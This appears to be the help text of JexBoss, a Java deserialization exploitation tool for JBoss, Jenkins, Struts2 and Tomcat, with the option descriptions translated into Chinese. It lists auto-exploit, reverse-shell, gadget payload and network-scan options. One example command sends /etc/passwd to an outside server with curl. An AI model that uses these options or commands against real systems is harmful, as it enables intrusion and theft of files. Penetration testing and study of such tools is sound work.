JexBoss-20170328

Usage: JexBoss [-h] [--version] [--auto-exploit] [--disable-check-updates] [-mode {standalone,auto-scan,file-scan}] [--app-unserialize] [--servlet-unserialize] [--jboss] [--jenkins] [--struts2] [--jmxtomcat] [--proxy PROXY] [--proxy-cred LOGIN:PASS] [--jboss-login LOGIN:PASS] [--timeout TIMEOUT] [--cookies NAME=VALUE] [--reverse-host RHOST:RPORT] [--cmd CMD] [--dns URL] [--windows] [--post-parameter PARAMETER] [--show-payload] [--gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}] [--load-gadget FILENAME] [--force] [-host HOST] [-network NETWORK] [-ports PORTS] [-results FILENAME] [-file FILENAME_HOSTS] [-out FILENAME_RESULTS]

可选参数:
  -h, --help                                                                              显示此帮助消息并退出
  --version                                                                               显示程序的版本号并退出
  --auto-exploit, -A                                                                      自动发送漏洞利用代码 (仅在获得许可后使用)
  --disable-check-updates, -D                                                             禁用更新检查
  -mode {standalone,auto-scan,file-scan}                                                  操作模式 (DEFAULT: standalone)
  --app-unserialize, -j                                                                   检查HTTP参数中的Java反序列化漏洞 (eg. javax.faces.ViewState, oldFormData, etc)
  --servlet-unserialize, -l                                                               检查Servlets (像Invoker接口们) 中的Java反序列化漏洞
  --jboss                                                                                 仅检查 JBOSS 向量
  --jenkins                                                                               仅检查 Jenkins CLI 向量 (CVE-2015-5317)
  --struts2                                                                               仅检查 Struts2 Jakarta 多部分解析器 (CVE-2017-5638)
  --jmxtomcat                                                                             在Tomcat中检查 JMX JmxRemoteLifecycleListener (CVE-2016-8735 and CVE-2016-3427) 默认情况下不会检查
  --proxy PROXY, -P PROXY                                                                 使用HTTP代理连接到目标URL (eg. -P http://192.168.0.1:3128)
  --proxy-cred LOGIN:PASS, -L LOGIN:PASS                                                  代理身份验证凭据 (eg. -L name:password)
  --jboss-login LOGIN:PASS, -J LOGIN:PASS                                                 在JBoss 5和JBoss 6中利用admin-console的JBoss登录名和密码 (default: admin:admin)
  --timeout TIMEOUT                                                                       超时连接之前等待的秒数 (default 3)
  --cookies NAME=VALUE                                                                    为Struts2漏洞利用指定Cookies 使用它来测试需要身份验证的功能 Format: "NAME1=VALUE1; NAME2=VALUE2" (eg. --cookie "JSESSIONID=24517D9075136F202DCE20E9C89D424D")

独立模式:
  -host HOST, -u HOST                                                                     要检查的主机地址 (eg. -u http://192.168.0.10:8080)

高级选项 (在应用程序层中探索Java反序列化时使用):
  --reverse-host RHOST:RPORT, -r RHOST:RPORT                                              利用应用程序层中的Java反序列化漏洞时反向Shell程序的远程主机地址和端口 (目前仅适用于Linux系统) (eg. 192.168.0.10:1331)
  --cmd CMD, -x CMD                                                                       发送特定命令以在目标上运行 (eg. curl -d @/etc/passwd http://your_server)
  --dns URL                                                                               指定要与 "dns" Gadget 一起使用的DNS查询
  --windows, -w                                                                           指定命令用于Windows系统 (cmd.exe)
  --post-parameter PARAMETER, -H PARAMETER                                                指定参数以查找序列化对象并注入它 (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState)
  --show-payload, -t                                                                      打印生成的有效载荷
  --gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}    指定Gadget的类型以自动生成有效载荷 (DEFAULT: commons-collections3.1 or groovy1 for JenKins)
  --load-gadget FILENAME                                                                  从文件中提供您自己的Gadget (RAW模式下的Java序列化对象)
  --force, -F                                                                             强制发送Java序列化的Gadgets到"-u"参数通知的地址 这将以多种格式 (eg. RAW, GZIPED and BASE64) 以及不同的Content-Types发送有效载荷

自动扫描模式:
  -network NETWORK                                                                        以CIDR格式表示的要检查的网络 (eg. 10.0.0.0/8)
  -ports PORTS                                                                            每个主机要检查的以逗号分隔的端口列表 (eg. 8080,8443,8888,80,443)
  -results FILENAME                                                                       用于存储自动扫描结果的文件

文件扫描模式:
  -file FILENAME_HOSTS                                                                    带有要扫描的主机列表的文件 (每行一个主机)
  -out FILENAME_RESULTS                                                                   用于存储文件扫描结果的文件

原文地址:https://www.cnblogs.com/f0rsaken/p/14610379.html